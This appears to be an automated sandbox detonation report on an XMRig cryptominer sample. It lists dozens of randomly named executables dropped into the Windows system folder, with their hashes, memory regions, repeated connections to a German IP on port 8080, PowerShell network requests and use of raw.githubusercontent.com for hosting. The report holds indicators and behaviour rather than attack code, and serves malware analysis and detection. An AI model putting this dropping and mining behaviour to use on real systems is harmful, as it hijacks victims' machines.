C:\Windows\System\ucfGRAW.exe

C:\Windows\System\NYdISFw.exe

C:\Windows\System\NYdISFw.exe

C:\Windows\System\UbaVNSJ.exe

C:\Windows\System\UbaVNSJ.exe

C:\Windows\System\DAOITes.exe

C:\Windows\System\DAOITes.exe

C:\Windows\System\IxsLJlA.exe

C:\Windows\System\IxsLJlA.exe

C:\Windows\System\MUiJOCi.exe

C:\Windows\System\MUiJOCi.exe

C:\Windows\System\lLBwSvK.exe

C:\Windows\System\lLBwSvK.exe

C:\Windows\System\SxytNwZ.exe

C:\Windows\System\SxytNwZ.exe

C:\Windows\System\EqWWsST.exe

C:\Windows\System\EqWWsST.exe

C:\Windows\System\pYeKRfc.exe

C:\Windows\System\pYeKRfc.exe

C:\Windows\System\vuySKHK.exe

C:\Windows\System\vuySKHK.exe

C:\Windows\System\PMDflvR.exe

C:\Windows\System\PMDflvR.exe

C:\Windows\System\GwbBuqy.exe

C:\Windows\System\GwbBuqy.exe

C:\Windows\System\PTCGQSJ.exe

C:\Windows\System\PTCGQSJ.exe

C:\Windows\System\ViEglVY.exe

C:\Windows\System\ViEglVY.exe

C:\Windows\System\fyrUVsC.exe

C:\Windows\System\fyrUVsC.exe

C:\Windows\System\wENcWWv.exe

C:\Windows\System\wENcWWv.exe

C:\Windows\System\PJdAIeL.exe

C:\Windows\System\PJdAIeL.exe

C:\Windows\System\QiftTEl.exe

C:\Windows\System\QiftTEl.exe

C:\Windows\System\GsauMSa.exe

C:\Windows\System\GsauMSa.exe

C:\Windows\System\Ykcyvcv.exe

C:\Windows\System\Ykcyvcv.exe

C:\Windows\System\uIVurca.exe

C:\Windows\System\uIVurca.exe

C:\Windows\System\jajUNAP.exe

C:\Windows\System\jajUNAP.exe

C:\Windows\System\Wuuuxtf.exe

C:\Windows\System\Wuuuxtf.exe

C:\Windows\System\nhvdLwx.exe

C:\Windows\System\nhvdLwx.exe

C:\Windows\System\wBnfRDw.exe

C:\Windows\System\wBnfRDw.exe

C:\Windows\System\tJXCbcw.exe

C:\Windows\System\tJXCbcw.exe

C:\Windows\System\qjrxzLK.exe

C:\Windows\System\qjrxzLK.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2212-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/2212-1-0x000000013F8A0000-0x000000013FC92000-memory.dmp

C:\Windows\system\NlgCNPq.exe

MD5 433f11dd1fa9006e524839e05714f3a2
SHA1 177de5d5da7359fbe09d61780f7a037bb7c4aa96
SHA256 8d80a2520b8fd92d4ea3d02023fd946c8d50c8f698ec8f969b2d116b9ca635b2
SHA512 63389cab535007b2b8ac994ba4618172a58dd3dc705fc4a98c11cb35f530479d960bf71430bc1a25211768e215021bd4afa93422ef6215bc1b9a49b36e3c7fc2

memory/2212-12-0x000000013F290000-0x000000013F682000-memory.dmp

C:\Windows\system\XvdQebu.exe

MD5 e92735ec95923708bef4104ea8f5751f
SHA1 b551145e48a884c289a5e08611115e3198333158
SHA256 ba785dc2f7c515fec7e68f4da67ae4ab6755d4c7b9f60b6493938ba8ebef5a56
SHA512 aed97a2893704231b207d318ac878de0b2c55dd7203cdb366f7d8e04e55309b82ddb5b1fe5d003fb1e980e6dce5b15fbc331b6974ffc5e74edcf312c16cf4ef5

memory/2212-41-0x0000000002BE0000-0x0000000002FD2000-memory.dmp

C:\Windows\system\daGDcMk.exe

MD5 8fab333d3e33dea39b1389360543a307
SHA1 64cf2818018b278a20708311cbc7a7ef7e49113d
SHA256 ac453550ef4476564cb995913585d15ee0b96bf680a4b1a0cb85c0b5509e493e
SHA512 5a98cc2ebd529447092ba4dac1b6a34a42e7f1f98be36fe923cce1f125a2987198e0e607b2d3df2bfa35ca956a1abb739c15312170a02d994b0053797b794306

C:\Windows\system\cflYcvJ.exe

MD5 6856e53de6a5860b48007a29f7a5982f
SHA1 2bf9c274356489b0596b3aaf4823a0f79cf9914e
SHA256 f44294dbd018ac3db3d200ab8ee350b4f805c2c2561605c3c48ef83e652268c3
SHA512 db47f1b3cef71cc8dc0b2f763c531ee28b654f7bd0581a33c074290233c99bd14b2340000a7e5dbe3c604520ade8d03b39135d6044ee0cf9e55413b59fa964ea

C:\Windows\system\JhEINBq.exe

MD5 aa231e89a20fba53d18c51d063de1634
SHA1 44488952d05c735f4a6935f91b1906c21fd72898
SHA256 d59f308c9c4ae5bc4c8992f3b2c794973a65bfad218735df6394e4a0a62b079a
SHA512 8184b0786c41b5bc2fab876ab20c41bace0f542cf32bd5ffe3a8c8839ee67873c59baa9eceee200c66a82c42b42c57a7ccb233b76ea8c1f2d7d04ad83a365139

C:\Windows\system\PgHCagB.exe

MD5 900555cb894dc1e366d1900bfeffee60
SHA1 1fabebd16b97d3eaa9ca5212a7e9b117aa5c82b8
SHA256 74a737c74055344840ee408d7f8cdebecac90f70b0cd04deb8f29c86356806a8
SHA512 2ccc771b6f1597a250e626a2d556b6eab867ba2882029865b86aacf2ce0ecd808c6923b017c0872f9148150762e311146be10c987e2d934386f4f85c0869e043

C:\Windows\system\hbENexV.exe

MD5 7ef2ea21fa0883ec48e1ad7e66005c37
SHA1 c31c80b3b4a77bfc5810f642939f0c71f8cea9b1
SHA256 c2d4865cf5153341868104e248430f4350b4282bcd9cc3783e831941155d700b
SHA512 035eab670887b4045f9313c9a0d7d220434336105e37075c9baec6c6a5a131bab76aa945528a1450dbf93c5cd62629e5b895eb2cf0a7b3ff78d42bae7dfa4928

C:\Windows\system\KSmpXXG.exe

MD5 a0f2a6ebee7720a3dd0f1a9ed9191271
SHA1 bd5639aab7cf82b577e1d6c7e4fd3d095f0ad5a9
SHA256 137ebe971f78faf474644fc06649587de623c45f36165d0fe71b1898b8ecb56a
SHA512 83fa8013b53fe86104a448416a0774eb33365648965141797b800bf8bb0a209b54ffb8fdf227b65d8c679aa040f9d4f70695b52a2fcdb55c00c660cbf8450023

C:\Windows\system\tHCaKut.exe

MD5 1c6eca01d9c19b9b9ba42355ee3b134b
SHA1 98edd2188ba0a53a2918ecea0325d48a73aa99a5
SHA256 6d83a4a744b372746357de2f8a19ddab77116d6977a2e6360e7c151c0254382b
SHA512 745a2cfb68ec0ce5f6bfdf4eb77530cbce6fc526674fd1113c3219e2954e61bb6df48a755087dbd03baf91448280f2898eeabcab51a2a16d5a523f6930a02d38

C:\Windows\system\oNLzwTr.exe

MD5 237f4bf97f26e85a6c38e33e14342261
SHA1 75396e407f0fd9701113166583fec830862f512e
SHA256 d6aa5aab48147a219c7b848d7518cf4e4396f2e2dbedc8edbe3848a45aa3dca7
SHA512 56c7b584fd1e704f2d806a0276ca3ef57378ace3de288d11d6d74082bfcd98464b295dee45f1a482d6ad2f141480f583941b4404c461b66c82ad6d3421d5a395

C:\Windows\system\SoYVwkK.exe

MD5 a58c995b239f314f1ff4b433bbda80ec
SHA1 942e68ba165a56eaf9d5d049135cdc5162de5577
SHA256 c7ef0bb6231c58144103326af2dfa4c6964f8501924e886e54f8853c5073f6be
SHA512 77edfecb58f5c8aea90d735bfea307dcc7213cddf5f3d2c42d04e49a61837ebc92f853bc8395efb4a9007a165e3cf5961172bcc2204f6ba18cbe7ef47bb7fdd7

memory/2212-140-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/1948-223-0x00000000025E0000-0x00000000025E8000-memory.dmp

memory/1948-298-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1536-284-0x000000013F580000-0x000000013F972000-memory.dmp

memory/2212-282-0x000000013F8A0000-0x000000013FC92000-memory.dmp

C:\Windows\system\gralLCl.exe

MD5 baf715322894b666fa689db486491092
SHA1 0caa0a479ef33c117363ca521904a41d39c6bf37
SHA256 35ef88832a08a5de63250972a9da58a327dcf79b56698f236961f86e6fa90feb
SHA512 f0254463165b40110c64604b2310694651ab4ce0897c87bafb3819416d1cb01a76fa79d17b801d7f2f388e2ca0bf84218a4d83ee8cd978fe3cf0849ff782e8dc

C:\Windows\system\XjFLIzq.exe

MD5 93dbcd95b2c2d380955510e37a3ad075
SHA1 22bae32a3b5deb1f7e90c5ac516defee5274e6d3
SHA256 9030adb9660b2ab156b3575439786c93d5e7d3b830bb780a223e5e2541f267e8
SHA512 ebd916b22348f8e49616e58126ef64a1e3f2b3e1c7f7aec4f28ed895a48667d5e736f81af9061f661ccac41d32808ab8f7565c8d7cb39fee64832deba2914b74

C:\Windows\system\yCzRqRJ.exe

MD5 4fcf3f50b9d4bacdab7e922ed281401b
SHA1 e0c32b0597b14b3e3e0a4776b620ce59ba07b872
SHA256 c5404f6ba9215231ee473bae103da5b3e48b272b5305b7403151940e71a91626
SHA512 04cd1a48d5505188150d5af2e86751f557674b91884a3cfb9229c94e1ce9f260d8f49805739bf41770035e12ac07d3a00d48d10d33568017f3ca0e97dd4de410

C:\Windows\system\WZVmHOR.exe

MD5 46690786960f8951f928f59033eafdd3
SHA1 95ea130ce261583dbd3aa950afc43769e05ebed3
SHA256 2c3c8820b9bd15af8eec5a3f8769a942e16f4ca3e91564c2388559f816dc858b
SHA512 dcdfa857ef9692b955cc88e89aabf708342a5f820fd6672460040075b2bb09e2ea4ac3206e126b482f7957d27d381789b0b8cb2376b74e7596139f2aab7b86ee

C:\Windows\system\GPYydnB.exe

MD5 f6b011b219a16275c1ac67c38c6e5cb0
SHA1 c3d5f1930324b9bcf65ec928740cf63ae916f83f
SHA256 5c6feb43b2f6a759e3b26792818a188938bdafd9dcb5dcab8dc2604efeed5b33
SHA512 51b822ca261f5c2a93ecc1eb8f340d25cc054befdfe07eb6ef63407e55fb9e84620e1d8738e107396a2854bf61991d077b00e313330515db6be54a42f8a0e074

C:\Windows\system\EUwRvBb.exe

MD5 9c4f78bab936fd0b4d848d4abbec3ae1
SHA1 a2e693be356aebab784e3e9e74279e4f2935f783
SHA256 8891c6d5aa49b8b02d137713b7d1798aa24c231ed81127dd705ab1e988c9e756
SHA512 10323e135fd6f67c762b87b32e5849ead0e3d6ff4449bf94cec9cdbc9f5fbe66dbc1976e9175dcd8dcd696fa16a84dff0c155610f128ad94522bd593a627c494

C:\Windows\system\jwlejST.exe

MD5 8d3190b742e0fa0c49d49a593483c130
SHA1 c28a8f3147727e36843c43f960d1fe53c7afaf4b
SHA256 b523c8f67dbd17fa6daf2b27450eded0dac87c13c96a572ca460526dce30c678
SHA512 82118e4c3b752f2f71bab129d7e3a5e767c7b6edef6306ede6d5b4d263e663a3deaf18c71c7c190f7fb247f7982824b67c2031bfd91beff934c00fa6c225bd15

memory/2588-139-0x000000013F550000-0x000000013F942000-memory.dmp

memory/2212-138-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2532-137-0x000000013FD20000-0x0000000140112000-memory.dmp

memory/2212-136-0x000000013FD20000-0x0000000140112000-memory.dmp

memory/2212-135-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2684-134-0x000000013F040000-0x000000013F432000-memory.dmp

memory/2212-133-0x000000013F040000-0x000000013F432000-memory.dmp

memory/2536-132-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2676-131-0x000000013FB80000-0x000000013FF72000-memory.dmp

memory/2540-130-0x000000013F5D0000-0x000000013F9C2000-memory.dmp

memory/2212-129-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2212-128-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2664-127-0x000000013F550000-0x000000013F942000-memory.dmp

memory/2212-126-0x0000000002BE0000-0x0000000002FD2000-memory.dmp

memory/2212-125-0x000000013F1F0000-0x000000013F5E2000-memory.dmp

memory/1948-124-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1948-123-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

C:\Windows\system\kpUBkjW.exe

MD5 af428d5f043bf690e5b715c46fe315ca
SHA1 b04d66f7ed43f5be28becb237ab0722b6aecbb4d
SHA256 ac0fa145824889f47e0657accb52ef962cd203c6a66c0303f5dae8083bacfc70
SHA512 ff1ae3b1f52835aafb887cfa83f37a026aed3b9346187431dc56bced9e501edc5443d07b8bc4e31fb60781ba29819758e96eb45dbbf09450f0894c84f2b1e4ba

C:\Windows\system\pbIuqss.exe

MD5 0cdf7d7f0fc905b29fe02b2740eca26f
SHA1 5285ea100ac981dc7b8d794630b9ae4cde7f17aa
SHA256 7223ecc919a28ca90a62ff8b91a0570fab79d85cefd82211bbc0767a7012dd02
SHA512 d88c79f558f3581510e0eefd07ee9c8496cbbc194b7c512f14eb6db19ebde1cb9595a6f199aef2d2da25b3415686961a5ba16c49df24ae9826f1e041827e4519

memory/1948-109-0x000000001B330000-0x000000001B612000-memory.dmp

C:\Windows\system\aytEyyB.exe

MD5 d895ebeacc7feb0f259c64b4ce95517d
SHA1 8bf07fb66066701d9f8b268ec86943031690d7c2
SHA256 3ad44e4d4d246a57674b4af7ee622c4fb6565c2fe555787112bfd5e14d89301a
SHA512 1248f52c8925041d48f74159663b714a93d32576c0a7fba8bb431b75301f9ed1bf30a4abb99e1673864fa9608f72ccbfaa3be4d03ba856500d6aab513dd42c48

C:\Windows\system\omwhhut.exe

MD5 3a7ef11889ee5578ee8a35d6e029d897
SHA1 3f587258d58b4a7ff1c5d5521288f89a79c0a53d
SHA256 6ef651f9c272a2ced98de2315935974150a2570a23a41a17a0a14245c5bf7e4e
SHA512 6441d964b04b84f773f133acbce5efcbc22f661943161a488bb7d60e09a3d5849aa7cf7cc20a371dd698d95780f24feb7167b43780b8b1961bbf672d951ac4bd

C:\Windows\system\dzxPdXY.exe

MD5 b77aa025f818bef3b0e696e7b05072d6
SHA1 a7f2f58d49da7e3c4459026f94963bace24cf24c
SHA256 30547c94a5ba9b7bfa47e5a225a74d29e1e8c220400b3048da4108b591fe46af
SHA512 3efa5bbea36bced91cdeed199fea7c9f16c29ed69e336814b5d161e90d2dfe588070addb8c629bcf2761d246f6ec88a2aa92d683f307dd26dd8e16a558408efb

C:\Windows\system\DSUGdFM.exe

MD5 15cdc180f6c4aa0e4e62a7e0a844cb7a
SHA1 762dce82be82fd33de665e80a0a25304c056ff64
SHA256 0c1fbbc0c08febcf21744b2bb514f93babaefdeac7c1f653334017c040acffef
SHA512 bc6b0aef82ffb7877ec6aeed0b28cea0d1f93eb833d965285a827b29e034054d318f3a0fa562a3d66a3fd96013e8770ec3a8d94ff7134b4f8f2fee926729278e

C:\Windows\system\BTzOJlq.exe

MD5 5007802030913287f4d400f3948daf58
SHA1 895dc7d0730a6378c1a650ea7e9ffa669f43a84b
SHA256 24d14160899acc3fc4a5167a963233124e7dc9997431540a480592e55d92a4b2
SHA512 0fbe8fa68e66ef20266eb2f907057baa919247c58d1bde01a7449fc9bffa745ad1344b6274f055e73608ab3bb07b5c52f530e523608b6bdc1fc83959076f4449

C:\Windows\system\kwrCXhu.exe

MD5 ba6034082020d0848b70b2d46038370d
SHA1 7ba34fc87615bc1ba5fecff53842422b9a3eeb67
SHA256 c75f055845c3f4fc5aacb1215a38919ebde39ebf2da6c556fb90111c314fcaef
SHA512 f8796b97188d1f95e841fd14c28b496a006544c48377bead47f99a30e697ed3c873097194a88e614919c3d8258663d5013f15bf9f2894308aedf00c2d28bbe9e

C:\Windows\system\VCSHQqH.exe

MD5 fa05ebaf05e104d731ff1111946b3d7f
SHA1 5d68478cfc9f515cb87e54e79133ccb7ad67c83b
SHA256 774226afd1cee93b9a9081358bc25b506fbcc1a5297ef837e71cb39099f036a4
SHA512 17a28e1ae36f809f2f3524378dbdac9e73c81d1e7c891e58661b4b019561a50ce14a6a2705b3762270b96402d0ac667ff6cc08444abac7e78c11d93c8442a4e9

C:\Windows\system\UXyYTln.exe

MD5 f2415adeac11701abe190dea63d91a89
SHA1 7117ed44b0eeb4f1c4b2e655e049185c1cd37e3a
SHA256 7ce623d17f458cd43e6d1c8520f02a040d3871e460460a03b9d1ba6a7cd043d2
SHA512 9e8b6038e2eebd6f32ed510bfb6089ca7d2a36cf26a5dbcee764b62059bcaaaf655cc59d3f47d881f238a03a9e10bc9f017fe3d326cf6e64410180f14b58d0ff

memory/2760-47-0x000000013FB50000-0x000000013FF42000-memory.dmp

C:\Windows\system\ajKlAqP.exe

MD5 c9796546b813e1a85e1d3d604693bdd6
SHA1 76220e90e2d5a6e39964451aa0fff73727495bbd
SHA256 0b1561e6729fb0bd6b24c4f8d9011784f134d4257481b3845f4b9eff55e2b6d3
SHA512 72edefd4f2cae6529fddd82b13caa479494cc3d04f56790044fe7515409172cd54626561d4f84ce71b7ebb901c2cf6da93ae93712f667f482be5da61568296f6

memory/2624-36-0x000000013F1F0000-0x000000013F5E2000-memory.dmp

C:\Windows\system\bmvEBsT.exe

MD5 7a28610aaeb5d8e138172b5103628075
SHA1 d7ef6d2cc66ba71690d078e5ffc37a8e68ac6361
SHA256 23d8d79a62b6e1940ac87a6afe72528f7e949df38e6cb7331d364e221fd72f7d
SHA512 9db68789f5fe8535e9b8e8be323f434c824d7ba4b62f9cec8e96550846c05ce4c100fa88f3e62e09f30785a596852864f541856be8a0f2541cdfe694ce77ac98

C:\Windows\system\Mhjgxzm.exe

MD5 644a29178f4cd0711cf2569300a79a66
SHA1 8e5783890156fac21b07b6942098b9bd6c0a9408
SHA256 88d1ae8847f230fe8017035336cecc3cbada15808a0946d31affd2a7c4e0fcbe
SHA512 ebcd6cd8ebcd5ffc6ec3f46dbda4b738431471a3e5f603b59cad8b6c23e4288448eebde173cfc32535dcb481c66416a293dfc3b25f4971273ccb6d6c44f0e9c0

memory/1536-31-0x000000013F580000-0x000000013F972000-memory.dmp

memory/2212-20-0x0000000002BE0000-0x0000000002FD2000-memory.dmp

memory/1948-19-0x000007FEF5E9E000-0x000007FEF5E9F000-memory.dmp

memory/1948-18-0x0000000002980000-0x0000000002A00000-memory.dmp

memory/2384-17-0x000000013F290000-0x000000013F682000-memory.dmp

C:\Windows\system\ShhklzO.exe

MD5 4f55995004ddbbf20fd131f5785b4994
SHA1 de6a37b5af092cb7f035849261ecb2f365a2c77d
SHA256 5c41e02120aac33692e95ba06ca6d609677c6986b8f7b39c95a1bfbb4aacf3ad
SHA512 0ef92ec92c67c7b1be18a20b6e23539fffe7a4176729dd00b850d6ff39b7d8b0fc066e7727b137f3bbf1533ba333bb1b41a3ce4a7265ff9e4582712e2d11c49e

memory/2540-1247-0x000000013F5D0000-0x000000013F9C2000-memory.dmp

memory/2384-1250-0x000000013F290000-0x000000013F682000-memory.dmp

memory/1536-1253-0x000000013F580000-0x000000013F972000-memory.dmp

memory/2760-1249-0x000000013FB50000-0x000000013FF42000-memory.dmp

memory/2624-1244-0x000000013F1F0000-0x000000013F5E2000-memory.dmp

memory/2664-1269-0x000000013F550000-0x000000013F942000-memory.dmp

memory/2588-1391-0x000000013F550000-0x000000013F942000-memory.dmp

memory/896-1426-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2536-1382-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2676-1424-0x000000013FB80000-0x000000013FF72000-memory.dmp

memory/2532-1336-0x000000013FD20000-0x0000000140112000-memory.dmp

memory/2684-1335-0x000000013F040000-0x000000013F432000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 06:49

Reported

2024-06-14 06:52

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\tCGWtrx.exe N/A
N/A N/A C:\Windows\System\qYLsnVI.exe N/A
N/A N/A C:\Windows\System\KtUVqDC.exe N/A
N/A N/A C:\Windows\System\PNSvijT.exe N/A
N/A N/A C:\Windows\System\HwmsqJj.exe N/A
N/A N/A C:\Windows\System\SYkSVVz.exe N/A
N/A N/A C:\Windows\System\zIyOHCJ.exe N/A
N/A N/A C:\Windows\System\Iqehtve.exe N/A
N/A N/A C:\Windows\System\QmRDgFX.exe N/A
N/A N/A C:\Windows\System\KAGpeQT.exe N/A
N/A N/A C:\Windows\System\iahHWaR.exe N/A
N/A N/A C:\Windows\System\CrZtOAh.exe N/A
N/A N/A C:\Windows\System\RBWdFQz.exe N/A
N/A N/A C:\Windows\System\cvGtMYy.exe N/A
N/A N/A C:\Windows\System\maMhBoL.exe N/A
N/A N/A C:\Windows\System\yzeNtes.exe N/A
N/A N/A C:\Windows\System\FtQYuYf.exe N/A
N/A N/A C:\Windows\System\PlCZsDB.exe N/A
N/A N/A C:\Windows\System\KpHveNn.exe N/A
N/A N/A C:\Windows\System\AorfjIr.exe N/A
N/A N/A C:\Windows\System\ijlmOHf.exe N/A
N/A N/A C:\Windows\System\axsnuIh.exe N/A
N/A N/A C:\Windows\System\UaZOuXE.exe N/A
N/A N/A C:\Windows\System\VtRMRez.exe N/A
N/A N/A C:\Windows\System\YAEyqJg.exe N/A
N/A N/A C:\Windows\System\kADKegI.exe N/A
N/A N/A C:\Windows\System\PcPaVyj.exe N/A
N/A N/A C:\Windows\System\OVzTxya.exe N/A
N/A N/A C:\Windows\System\qkwCFxX.exe N/A
N/A N/A C:\Windows\System\UdnlBmh.exe N/A
N/A N/A C:\Windows\System\UrKttdg.exe N/A
N/A N/A C:\Windows\System\qhKsvJo.exe N/A
N/A N/A C:\Windows\System\ZiKCesX.exe N/A
N/A N/A C:\Windows\System\SSavQZK.exe N/A
N/A N/A C:\Windows\System\OIJNfgK.exe N/A
N/A N/A C:\Windows\System\SeODjOb.exe N/A
N/A N/A C:\Windows\System\rWTjeSp.exe N/A
N/A N/A C:\Windows\System\pYfamYH.exe N/A
N/A N/A C:\Windows\System\jePaBuR.exe N/A
N/A N/A C:\Windows\System\NZlqyQC.exe N/A
N/A N/A C:\Windows\System\RmVhEgn.exe N/A
N/A N/A C:\Windows\System\vpXUlad.exe N/A
N/A N/A C:\Windows\System\KLDzAbz.exe N/A
N/A N/A C:\Windows\System\TgWhyRr.exe N/A
N/A N/A C:\Windows\System\lFUfkHJ.exe N/A
N/A N/A C:\Windows\System\YmPXJWy.exe N/A
N/A N/A C:\Windows\System\LvNUadu.exe N/A
N/A N/A C:\Windows\System\WfZsRtX.exe N/A
N/A N/A C:\Windows\System\zlifoFN.exe N/A
N/A N/A C:\Windows\System\vOXoAVH.exe N/A
N/A N/A C:\Windows\System\kDKVkyX.exe N/A
N/A N/A C:\Windows\System\hWyoqVO.exe N/A
N/A N/A C:\Windows\System\MwZbtlX.exe N/A
N/A N/A C:\Windows\System\XHlwLUb.exe N/A
N/A N/A C:\Windows\System\NkRmZMR.exe N/A
N/A N/A C:\Windows\System\zpPlell.exe N/A
N/A N/A C:\Windows\System\BTYCazR.exe N/A
N/A N/A C:\Windows\System\CdwoOiQ.exe N/A
N/A N/A C:\Windows\System\zLLdqrT.exe N/A
N/A N/A C:\Windows\System\qSiDpAG.exe N/A
N/A N/A C:\Windows\System\cpabajI.exe N/A
N/A N/A C:\Windows\System\wvPYvLa.exe N/A
N/A N/A C:\Windows\System\TgNQFzo.exe N/A
N/A N/A C:\Windows\System\AnIWAfI.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\iJzgVYO.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\SdZfgUh.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\zKtbEJk.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\TmBrpfw.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\VCcumOc.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\lxggcNn.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\TBBTCjN.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\umQHMlR.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\tCGWtrx.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\XUHYVtf.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\dKxZJGG.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\fHQvOGM.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\mROqmbu.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\AWmFOTe.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\HXoogyZ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\RkUNBfZ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\isZPSsz.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
